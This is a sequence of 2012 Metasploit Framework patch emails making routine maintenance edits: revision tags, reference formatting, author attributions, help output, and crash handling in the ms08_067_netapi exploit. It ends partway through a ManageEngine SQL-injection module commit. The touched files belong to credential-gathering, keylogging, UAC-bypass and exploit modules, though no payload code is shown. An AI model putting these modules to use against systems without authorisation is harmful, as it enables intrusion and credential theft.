Msf::Post 'Shubham Dawra ' # www.SecurityXploded.com ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: 14100 $', + 'Version' => '$Revision$', 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/outlook.rb b/modules/post/windows/gather/credentials/outlook.rb index a236496258..748f511119 100644 --- a/modules/post/windows/gather/credentials/outlook.rb +++ b/modules/post/windows/gather/credentials/outlook.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Justin Cacak'], - 'Version' => '$Revision: 14835 $', + 'Version' => '$Revision$', 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] )) From 6147b332f1e5c3269dccb71df5cbcf7759a8ed27 Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 22 Oct 2012 14:15:58 -0500 Subject: [PATCH 26/74] Rescue when the service is crashed Failed exploit attempts leave the service in a state where the port is still open but login attmempts reset the connection. Rescue that and give the user an indication of what's going on. --- .../exploits/windows/smb/ms08_067_netapi.rb | 22 +++++++++++++++++-- 1 file changed, 20 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb index 8d50d9bf4a..e60da6e5a3 100644 --- a/modules/exploits/windows/smb/ms08_067_netapi.rb +++ b/modules/exploits/windows/smb/ms08_067_netapi.rb @@ -807,8 +807,18 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - connect() - smb_login() + begin + connect() + smb_login() + rescue Rex::Proto::SMB::Exceptions::LoginError => e + if (e.message =~ /Connection reset/) + print_error("Connection reset during login") + print_error("This most likely means a previous exploit attempt caused the service to crash") + return + else + raise e + end + end # Use a copy of the target mytarget = target @@ -1052,6 +1062,14 @@ class Metasploit3 < Msf::Exploit::Remote rescue Rex::ConnectionError => e print_error("Connection failed: #{e.class}: #{e}") return + rescue Rex::Proto::SMB::Exceptions::LoginError => e + if (e.message =~ /Connection reset/) + print_error("Connection reset during login") + print_error("This most likely means a previous exploit attempt caused the service to crash") + return Msf::Exploit::CheckCode::Unknown + else + raise e + end end # From eb76c46ddd4bf5a07a8c7a5374045958ec068a48 Mon Sep 17 00:00:00 2001 From: Michael Schierl Date: Mon, 22 Oct 2012 21:24:36 +0200 Subject: [PATCH 27/74] Infohash key cleanups Replace obvious typos in infohash keys. Note that this *does* affect the behaviour as those keys have been ignored before. --- modules/exploits/linux/local/udev_netlink.rb | 2 +- modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/local/udev_netlink.rb b/modules/exploits/linux/local/udev_netlink.rb index 91f560d713..c9fcd64d47 100644 --- a/modules/exploits/linux/local/udev_netlink.rb +++ b/modules/exploits/linux/local/udev_netlink.rb @@ -60,7 +60,7 @@ class Metasploit4 < Msf::Exploit::Local [ 'Linux x64', { 'Arch' => ARCH_X86_64 } ], #[ 'Command payload', { 'Arch' => ARCH_CMD } ], ], - 'DefaultOptons' => { 'WfsDelay' => 2 }, + 'DefaultOptions' => { 'WfsDelay' => 2 }, 'DefaultTarget' => 0, 'DisclosureDate' => "Apr 16 2009", } diff --git a/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb b/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb index fbea3a7691..f9c5a4b47f 100644 --- a/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb +++ b/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb @@ -43,7 +43,7 @@ class Metasploit4 < Msf::Exploit::Remote { 'BadChars' => "\x00\x3a\x3b\x3d\x3c\x3e\x0a\x0d\x22\x26\x27\x2f\x60\xb4", }, - 'Platforms' => [ 'win' ], + 'Platform' => [ 'win' ], 'Targets' => [ [ From 601ecec2cf73e948204f212be14ac15e232301ca Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 22 Oct 2012 15:16:55 -0500 Subject: [PATCH 28/74] Use opts.usage instead of a Table --- .../console/command_dispatcher/stdapi/sys.rb | 28 +++++-------------- 1 file changed, 7 insertions(+), 21 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index 5e09ef8cd5..485c2c4b9b 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb @@ -43,14 +43,14 @@ class Console::CommandDispatcher::Stdapi::Sys "-t" => [ true, "The registry value type (E.g. REG_SZ)." ], "-v" => [ true, "The registry value name (E.g. Stuff)." ], "-r" => [ true, "The remote machine name to connect to (with current process credentials" ], - "-w" => [ false, "Set KEY_WOW64 flag, valid values [32|64]." ]) + "-w" => [ false, "Set KEY_WOW64 flag, valid values [32|64]." ]) @@ps_opts = Rex::Parser::Arguments.new( - "-h" => [false, "Help menu."], - "-S" => [true, "RegEx term to filter on process name with "], - "-A" => [true, "Arch to filter on (x86 or x86_64"], - "-s" =>[false, "Show only SYSTEM processes"], - "-U" => [true, "RegEx term to filter on user name with"]) + "-h" => [ false, "Help menu." ], + "-S" => [ true, "Filters processes on the process name using the supplied RegEx"], + "-A" => [ true, "Filters processes on architecture (x86 or x86_64)" ], + "-s" => [ false, "Show only SYSTEM processes" ], + "-U" => [ true, "Filters processes on the user using the supplied RegEx" ]) # # List of supported commands. @@ -343,21 +343,7 @@ class Console::CommandDispatcher::Stdapi::Sys print_line "Use the command with no arguments to see all running processes." print_line "The following options can be used to filter those results:" - tbl = Rex::Ui::Text::Table.new( - 'Header' => "Options List", - 'Indent' => 1, - 'Columns' => - [ - "Option", - "Details" - ] - ) - - tbl << ["-s", "Display only SYSTEM processes"] - tbl << ["-S ", "Filters processes on the process name using the supplied RegEx"] - tbl << ["-A ", "Filters processes on the arch. (x86, x86_64)"] - tbl << ["-U ", "Filters processes on the user using the supplied RegEx"] - print_line tbl.to_s + print_line @@ps_opts.usage end From f1829b40e1f7a7620acb1b6206087fd54a6f7806 Mon Sep 17 00:00:00 2001 From: Michael Schierl Date: Mon, 22 Oct 2012 22:34:47 +0200 Subject: [PATCH 29/74] References cleanup Uppercase MSB, spaces in URLs. --- modules/exploits/windows/fileformat/ms12_005.rb | 2 +- modules/exploits/windows/iis/ms02_065_msadc.rb | 2 +- modules/exploits/windows/iis/msadc.rb | 4 ++-- modules/exploits/windows/local/bypassuac.rb | 2 +- modules/post/windows/escalate/bypassuac.rb | 2 +- 5 files changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/exploits/windows/fileformat/ms12_005.rb b/modules/exploits/windows/fileformat/ms12_005.rb index 6364632d08..4cbfa12ec1 100644 --- a/modules/exploits/windows/fileformat/ms12_005.rb +++ b/modules/exploits/windows/fileformat/ms12_005.rb @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote [ ['CVE', '2012-0013'], ['OSVDB', '78207'], - ['MSB', 'ms12-005'], + ['MSB', 'MS12-005'], ['BID', '51284'], ['URL', 'http://support.microsoft.com/default.aspx?scid=kb;EN-US;2584146'], ['URL', 'http://exploitshop.wordpress.com/2012/01/14/ms12-005-embedded-object-package-allow-arbitrary-code-execution/'] diff --git a/modules/exploits/windows/iis/ms02_065_msadc.rb b/modules/exploits/windows/iis/ms02_065_msadc.rb index 435fd68ec0..ce315ae0a8 100644 --- a/modules/exploits/windows/iis/ms02_065_msadc.rb +++ b/modules/exploits/windows/iis/ms02_065_msadc.rb @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote ['OSVDB', '14502'], ['BID', '6214'], ['CVE', '2002-1142'], - ['MSB', 'ms02-065'], + ['MSB', 'MS02-065'], ['URL', 'http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html'] ], 'Privileged' => false, diff --git a/modules/exploits/windows/iis/msadc.rb b/modules/exploits/windows/iis/msadc.rb index 4cdb4be539..5f5c6ab8c1 100644 --- a/modules/exploits/windows/iis/msadc.rb +++ b/modules/exploits/windows/iis/msadc.rb @@ -42,8 +42,8 @@ class Metasploit3 < Msf::Exploit::Remote ['OSVDB', '272'], ['BID', '529'], ['CVE', '1999-1011'], - ['MSB', 'ms98-004'], - ['MSB', 'ms99-025'] + ['MSB', 'MS98-004'], + ['MSB', 'MS99-025'] ], 'Targets' => [ diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb index 3788b2c7ee..983600d305 100644 --- a/modules/exploits/windows/local/bypassuac.rb +++ b/modules/exploits/windows/local/bypassuac.rb @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Local 'Targets' => [ [ 'Windows', {} ] ], 'DefaultTarget' => 0, 'References' => [ - [ 'URL', ' http://www.trustedsec.com/december-2010/bypass-windows-uac/' ] + [ 'URL', 'http://www.trustedsec.com/december-2010/bypass-windows-uac/' ] ], 'DisclosureDate'=> "Dec 31 2010" )) diff --git a/modules/post/windows/escalate/bypassuac.rb b/modules/post/windows/escalate/bypassuac.rb index 06ef199e58..9c88439bc4 100644 --- a/modules/post/windows/escalate/bypassuac.rb +++ b/modules/post/windows/escalate/bypassuac.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Post 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ], 'References' => [ - [ 'URL', ' http://www.trustedsec.com/december-2010/bypass-windows-uac/' ] + [ 'URL', 'http://www.trustedsec.com/december-2010/bypass-windows-uac/' ] ], 'DisclosureDate'=> "Dec 31 2010" )) From e675f4e901ce1b2d06bdd4d68c902b602b7c3ef7 Mon Sep 17 00:00:00 2001 From: Rob Fuller Date: Mon, 22 Oct 2012 17:01:58 -0400 Subject: [PATCH 30/74] standardizing author info --- lib/msf/core/module/author.rb | 3 ++- modules/auxiliary/scanner/http/enum_wayback.rb | 2 +- modules/auxiliary/scanner/http/httpbl_lookup.rb | 2 +- modules/exploits/windows/local/ask.rb | 4 +--- modules/exploits/windows/local/bypassuac.rb | 2 +- modules/post/windows/capture/lockout_keylogger.rb | 2 +- modules/post/windows/escalate/droplnk.rb | 2 +- modules/post/windows/gather/cachedump.rb | 5 ++++- modules/post/windows/gather/credentials/gpp.rb | 2 +- modules/post/windows/gather/credentials/mremote.rb | 2 +- modules/post/windows/gather/credentials/vnc.rb | 6 ++++-- modules/post/windows/gather/enum_domains.rb | 2 +- modules/post/windows/gather/enum_proxy.rb | 2 +- modules/post/windows/gather/enum_termserv.rb | 2 +- modules/post/windows/gather/reverse_lookup.rb | 2 +- modules/post/windows/gather/tcpnetstat.rb | 2 +- modules/post/windows/manage/clone_proxy_settings.rb | 2 +- modules/post/windows/recon/computer_browser_discovery.rb | 2 +- modules/post/windows/recon/resolve_hostname.rb | 2 +- modules/post/windows/recon/resolve_ip.rb | 2 +- 20 files changed, 27 insertions(+), 23 deletions(-) diff --git a/lib/msf/core/module/author.rb b/lib/msf/core/module/author.rb index 9cf4a0ef52..81ade99a2e 100644 --- a/lib/msf/core/module/author.rb +++ b/lib/msf/core/module/author.rb @@ -43,7 +43,8 @@ class Msf::Module::Author 'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com', 'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com', 'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com', - 'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com' + 'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com', + 'mubix' => 'mubix' + 0x40.chr + 'hak5.org' } # diff --git a/modules/auxiliary/scanner/http/enum_wayback.rb b/modules/auxiliary/scanner/http/enum_wayback.rb index e3725f4616..15f821499e 100644 --- a/modules/auxiliary/scanner/http/enum_wayback.rb +++ b/modules/auxiliary/scanner/http/enum_wayback.rb @@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary This module pulls and parses the URLs stored by Archive.org for the purpose of replaying during a web assessment. Finding unlinked and old pages. }, - 'Author' => [ 'Rob Fuller ' ], + 'Author' => [ 'mubix' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$' )) diff --git a/modules/auxiliary/scanner/http/httpbl_lookup.rb b/modules/auxiliary/scanner/http/httpbl_lookup.rb index b4b0f7b74f..ebb13a1247 100644 --- a/modules/auxiliary/scanner/http/httpbl_lookup.rb +++ b/modules/auxiliary/scanner/http/httpbl_lookup.rb @@ -23,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary This module can be used to enumerate information about an IP addresses from Project HoneyPot's HTTP Block List. }, - 'Author' => [ 'Rob Fuller ' ], + 'Author' => [ 'mubix' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb index 95009ac41d..88a8657f6b 100644 --- a/modules/exploits/windows/local/ask.rb +++ b/modules/exploits/windows/local/ask.rb @@ -27,9 +27,7 @@ class Metasploit3 < Msf::Exploit::Local UAC settings. }, 'License' => MSF_LICENSE, - 'Author' => [ - 'mubix ' # Port to local exploit - ], + 'Author' => [ 'mubix' ], 'Version' => '$Revision$', 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ], diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb index 983600d305..e297048830 100644 --- a/modules/exploits/windows/local/bypassuac.rb +++ b/modules/exploits/windows/local/bypassuac.rb @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Local 'Author' => [ 'David Kennedy "ReL1K" ', 'mitnick', - 'mubix ' # Port to local exploit + 'mubix' # Port to local exploit ], 'Version' => '$Revision$', 'Platform' => [ 'windows' ], diff --git a/modules/post/windows/capture/lockout_keylogger.rb b/modules/post/windows/capture/lockout_keylogger.rb index b9157b7034..c3e267b4f2 100644 --- a/modules/post/windows/capture/lockout_keylogger.rb +++ b/modules/post/windows/capture/lockout_keylogger.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Post Winlogon.exe. Using idle time and natural system changes to give a false sense of security to the user.}, 'License' => MSF_LICENSE, - 'Author' => ['Rob Fuller ', 'cg'], + 'Author' => [ 'mubix', 'cg' ], 'Version' => '$Revision$', 'Platform' => ['windows'], 'SessionTypes' => ['meterpreter'], diff --git a/modules/post/windows/escalate/droplnk.rb b/modules/post/windows/escalate/droplnk.rb index d2f0231d8e..952a279f30 100644 --- a/modules/post/windows/escalate/droplnk.rb +++ b/modules/post/windows/escalate/droplnk.rb @@ -19,7 +19,7 @@ class Metasploit3 < Msf::Post connections to be initiated from any user that views the shortcut. }, 'License' => MSF_LICENSE, - 'Author' => [ 'Rob Fuller '], + 'Author' => [ 'mubix' ], 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb index 3d84215cd6..f11137f1cf 100644 --- a/modules/post/windows/gather/cachedump.rb +++ b/modules/post/windows/gather/cachedump.rb @@ -27,7 +27,10 @@ class Metasploit3 < Msf::Post cached as a result of a GPO setting. The default setting on Windows is to store the last ten successful logins.}, 'License' => MSF_LICENSE, - 'Author' => ['Maurizio Agazzini ','Rob Fuller '], + 'Author' => [ + 'Maurizio Agazzini ', + 'mubix' + ], 'Version' => '$Revision$', 'Platform' => ['windows'], 'SessionTypes' => ['meterpreter'], diff --git a/modules/post/windows/gather/credentials/gpp.rb b/modules/post/windows/gather/credentials/gpp.rb index 4e337910a2..83d614a062 100644 --- a/modules/post/windows/gather/credentials/gpp.rb +++ b/modules/post/windows/gather/credentials/gpp.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post 'Loic Jaquemet ', 'scriptmonkey ', 'theLightCosine', - 'Rob Fuller ' #domain/dc enumeration code + 'mubix' #domain/dc enumeration code ], 'References' => [ diff --git a/modules/post/windows/gather/credentials/mremote.rb b/modules/post/windows/gather/credentials/mremote.rb index 25bece5d7a..041a73a45f 100644 --- a/modules/post/windows/gather/credentials/mremote.rb +++ b/modules/post/windows/gather/credentials/mremote.rb @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Post [ 'theLightCosine', 'hdm', #Helped write the Decryption Routine - 'Rob Fuller ' #Helped write the Decryption Routine + 'mubix' #Helped write the Decryption Routine ], 'Version' => '$Revision$', 'Platform' => [ 'windows' ], diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb index 1bf93f654e..0a31c63fd4 100644 --- a/modules/post/windows/gather/credentials/vnc.rb +++ b/modules/post/windows/gather/credentials/vnc.rb @@ -30,8 +30,10 @@ class Metasploit3 < Msf::Post This module extract DES encrypted passwords in known VNC locations }, 'License' => MSF_LICENSE, - 'Author' => ['Kurt Grutzmacher ', - 'Rob Fuller '], + 'Author' => [ + 'Kurt Grutzmacher ', + 'mubix' + ], 'Version' => '$Revision$', 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] diff --git a/modules/post/windows/gather/enum_domains.rb b/modules/post/windows/gather/enum_domains.rb index ceb18b1865..1ed481a319 100644 --- a/modules/post/windows/gather/enum_domains.rb +++ b/modules/post/windows/gather/enum_domains.rb @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Post controllers for that domain. }, 'License' => MSF_LICENSE, - 'Author' => [ 'Rob Fuller '], + 'Author' => [ 'mubix' ], 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/enum_proxy.rb b/modules/post/windows/gather/enum_proxy.rb index 44867f13e2..d6f62b70e6 100644 --- a/modules/post/windows/gather/enum_proxy.rb +++ b/modules/post/windows/gather/enum_proxy.rb @@ -24,7 +24,7 @@ class Metasploit3 < Msf::Post are set it pulls the current user, else it will pull the user's settings specified SID and target host. }, - 'Author' => [ 'mubix ' ], + 'Author' => [ 'mubix' ], 'License' => MSF_LICENSE, 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] diff --git a/modules/post/windows/gather/enum_termserv.rb b/modules/post/windows/gather/enum_termserv.rb index e779647c46..44f0f4d969 100644 --- a/modules/post/windows/gather/enum_termserv.rb +++ b/modules/post/windows/gather/enum_termserv.rb @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Post This module dumps MRU and connection data for RDP sessions }, 'License' => MSF_LICENSE, - 'Author' => ['Rob Fuller '], + 'Author' => [ 'mubix' ], 'Version' => '$Revision$', 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] diff --git a/modules/post/windows/gather/reverse_lookup.rb b/modules/post/windows/gather/reverse_lookup.rb index 3b2cc39299..363aaf9f76 100644 --- a/modules/post/windows/gather/reverse_lookup.rb +++ b/modules/post/windows/gather/reverse_lookup.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Post 'Version' => '$Revision$', 'Platform' => ['windows'], 'SessionTypes' => ['meterpreter'], - 'Author' => ['mubix'] + 'Author' => [ 'mubix' ] )) register_options( [ diff --git a/modules/post/windows/gather/tcpnetstat.rb b/modules/post/windows/gather/tcpnetstat.rb index 1030111a8b..d1eafb072f 100644 --- a/modules/post/windows/gather/tcpnetstat.rb +++ b/modules/post/windows/gather/tcpnetstat.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Post 'Name' => 'Windows Gather TCP Netstat', 'Description' => %q{ This Module lists current TCP sessions}, 'License' => MSF_LICENSE, - 'Author' => [ 'Rob Fuller '], + 'Author' => [ 'mubix' ], 'Version' => '$Revision$', 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter'] diff --git a/modules/post/windows/manage/clone_proxy_settings.rb b/modules/post/windows/manage/clone_proxy_settings.rb index 2ea6c63d5b..4393ed8716 100644 --- a/modules/post/windows/manage/clone_proxy_settings.rb +++ b/modules/post/windows/manage/clone_proxy_settings.rb @@ -24,7 +24,7 @@ class Metasploit3 < Msf::Post targeted user SID, supports remote hosts as well if remote registry is allowed. }, - 'Author' => [ 'mubix ' ], + 'Author' => [ 'mubix' ], 'License' => MSF_LICENSE, 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] diff --git a/modules/post/windows/recon/computer_browser_discovery.rb b/modules/post/windows/recon/computer_browser_discovery.rb index cda59b745e..9fdfd36568 100644 --- a/modules/post/windows/recon/computer_browser_discovery.rb +++ b/modules/post/windows/recon/computer_browser_discovery.rb @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Post WINDOWS (all Windows hosts), or UNIX (all Unix hosts). }, 'License' => MSF_LICENSE, - 'Author' => [ 'Rob Fuller '], + 'Author' => [ 'mubix' ], 'Version' => '$Revision$', 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] diff --git a/modules/post/windows/recon/resolve_hostname.rb b/modules/post/windows/recon/resolve_hostname.rb index 4bf64294a5..9e9b2006ae 100644 --- a/modules/post/windows/recon/resolve_hostname.rb +++ b/modules/post/windows/recon/resolve_hostname.rb @@ -15,7 +15,7 @@ class Metasploit3 < Msf::Post 'Name' => 'Windows Recon Resolve Hostname', 'Description' => %q{ This module resolves a hostname to IP address via the victim, similiar to the Unix dig command}, 'License' => MSF_LICENSE, - 'Author' => [ 'mubix '], + 'Author' => [ 'mubix' ], 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/recon/resolve_ip.rb b/modules/post/windows/recon/resolve_ip.rb index 56c05c1a35..792c68454a 100644 --- a/modules/post/windows/recon/resolve_ip.rb +++ b/modules/post/windows/recon/resolve_ip.rb @@ -19,7 +19,7 @@ class Metasploit3 < Msf::Post 'Name' => 'Windows Recon Resolve IP', 'Description' => %q{ This module reverse resolves a range or IP to a hostname}, 'License' => MSF_LICENSE, - 'Author' => [ 'mubix '], + 'Author' => [ 'mubix' ], 'Version' => '$Revision$', 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] From 7d531dcbba6a16c6ad150a28692ff4ba09e16048 Mon Sep 17 00:00:00 2001 From: Rob Fuller Date: Mon, 22 Oct 2012 17:07:58 -0400 Subject: [PATCH 31/74] fix spacing --- lib/msf/core/module/author.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/module/author.rb b/lib/msf/core/module/author.rb index 81ade99a2e..40cb980781 100644 --- a/lib/msf/core/module/author.rb +++ b/lib/msf/core/module/author.rb @@ -44,7 +44,7 @@ class Msf::Module::Author 'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com', 'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com', 'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com', - 'mubix' => 'mubix' + 0x40.chr + 'hak5.org' + 'mubix' => 'mubix' + 0x40.chr + 'hak5.org' } # From e84abef63b67b4e999913e3ad2a23ec57b4363be Mon Sep 17 00:00:00 2001 From: Rob Fuller Date: Mon, 22 Oct 2012 17:22:37 -0400 Subject: [PATCH 32/74] fix spacing for all authors --- lib/msf/core/module/author.rb | 66 +++++++++++++++++------------------ 1 file changed, 33 insertions(+), 33 deletions(-) diff --git a/lib/msf/core/module/author.rb b/lib/msf/core/module/author.rb index 40cb980781..adee15d752 100644 --- a/lib/msf/core/module/author.rb +++ b/lib/msf/core/module/author.rb @@ -12,39 +12,39 @@ class Msf::Module::Author # A hash of known author names Known = { - 'hdm' => 'hdm' + 0x40.chr + 'metasploit.com', - 'spoonm' => 'spoonm' + 0x40.chr + 'no$email.com', - 'skape' => 'mmiller' + 0x40.chr + 'hick.org', - 'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com', - 'optyx' => 'optyx' + 0x40.chr + 'no$email.com', - 'anonymous' => 'anonymous-contributor' + 0x40.chr + 'metasploit.com', - 'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com', - 'MC' => 'mc' + 0x40.chr + 'metasploit.com', - 'cazz' => 'bmc' + 0x40.chr + 'shmoo.com', - 'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com', - 'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl', - 'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au', - 'Ramon de C Valle'=> 'rcvalle' + 0x40.chr + 'metasploit.com', - 'I)ruid' => 'druid' + 0x40.chr + 'caughq.org', - 'egypt' => 'egypt' + 0x40.chr + 'metasploit.com', - 'kris katterjohn' => 'katterjohn' + 0x40.chr + 'gmail.com', - 'CG' => 'cg' + 0x40.chr + 'carnal0wnage.com', - 'et' => 'et' + 0x40.chr + 'metasploit.com', - 'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com', - 'kf' => 'kf_list' + 0x40.chr + 'digitalmunition.com', - 'ddz' => 'ddz' + 0x40.chr + 'theta44.org', - 'jduck' => 'jduck' + 0x40.chr + 'metasploit.com', - 'natron' => 'natron' + 0x40.chr + 'metasploit.com', - 'todb' => 'todb' + 0x40.chr + 'metasploit.com', - 'msmith' => 'msmith' + 0x40.chr + 'metasploit.com', - 'jcran' => 'jcran' + 0x40.chr + 'metasploit.com', - 'sinn3r' => 'sinn3r' + 0x40.chr + 'metasploit.com', - 'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com', - 'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com', - 'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com', - 'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com', - 'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com', - 'mubix' => 'mubix' + 0x40.chr + 'hak5.org' + 'hdm' => 'hdm' + 0x40.chr + 'metasploit.com', + 'spoonm' => 'spoonm' + 0x40.chr + 'no$email.com', + 'skape' => 'mmiller' + 0x40.chr + 'hick.org', + 'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com', + 'optyx' => 'optyx' + 0x40.chr + 'no$email.com', + 'anonymous' => 'anonymous-contributor' + 0x40.chr + 'metasploit.com', + 'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com', + 'MC' => 'mc' + 0x40.chr + 'metasploit.com', + 'cazz' => 'bmc' + 0x40.chr + 'shmoo.com', + 'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com', + 'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl', + 'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au', + 'Ramon de C Valle' => 'rcvalle' + 0x40.chr + 'metasploit.com', + 'I)ruid' => 'druid' + 0x40.chr + 'caughq.org', + 'egypt' => 'egypt' + 0x40.chr + 'metasploit.com', + 'kris katterjohn' => 'katterjohn' + 0x40.chr + 'gmail.com', + 'CG' => 'cg' + 0x40.chr + 'carnal0wnage.com', + 'et' => 'et' + 0x40.chr + 'metasploit.com', + 'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com', + 'kf' => 'kf_list' + 0x40.chr + 'digitalmunition.com', + 'ddz' => 'ddz' + 0x40.chr + 'theta44.org', + 'jduck' => 'jduck' + 0x40.chr + 'metasploit.com', + 'natron' => 'natron' + 0x40.chr + 'metasploit.com', + 'todb' => 'todb' + 0x40.chr + 'metasploit.com', + 'msmith' => 'msmith' + 0x40.chr + 'metasploit.com', + 'jcran' => 'jcran' + 0x40.chr + 'metasploit.com', + 'sinn3r' => 'sinn3r' + 0x40.chr + 'metasploit.com', + 'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com', + 'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com', + 'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com', + 'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com', + 'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com', + 'mubix' => 'mubix' + 0x40.chr + 'hak5.org' } # From 5c9b33b8fd18830e4378b2413aec0729f26b2c0a Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 22 Oct 2012 17:18:14 -0500 Subject: [PATCH 33/74] Add a missing post require --- modules/post/windows/gather/enum_proxy.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/post/windows/gather/enum_proxy.rb b/modules/post/windows/gather/enum_proxy.rb index d6f62b70e6..60ed0233dc 100644 --- a/modules/post/windows/gather/enum_proxy.rb +++ b/modules/post/windows/gather/enum_proxy.rb @@ -10,6 +10,7 @@ ## require 'msf/core' +require 'msf/core/post/windows/services' class Metasploit3 < Msf::Post @@ -108,4 +109,4 @@ class Metasploit3 < Msf::Post end -end \ No newline at end of file +end From 923ffe277dff66a2712a9f68f42cf1dcb2b742c6 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 11:32:09 -0500 Subject: [PATCH 34/74] Write EXE to JSP instead of using a TCPServer --- .../windows/http/manageengine_search_sqli.rb | 75 +++++-------------- 1 file changed, 18 insertions(+), 57 deletions(-) diff --git a/modules/exploits/windows/http/manageengine_search_sqli.rb b/modules/exploits/windows/http/manageengine_search_sqli.rb index 7d22cb3ab0..df64d9b802 100644 --- a/modules/exploits/windows/http/manageengine_search_sqli.rb +++ b/modules/exploits/windows/http/manageengine_search_sqli.rb @@ -11,7 +11,6 @@ class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::Remote::TcpServer include Msf::Exploit::EXE def initialize(info={}) @@ -19,10 +18,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => "ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection", 'Description' => %q{ This module exploits a SQL injection found in 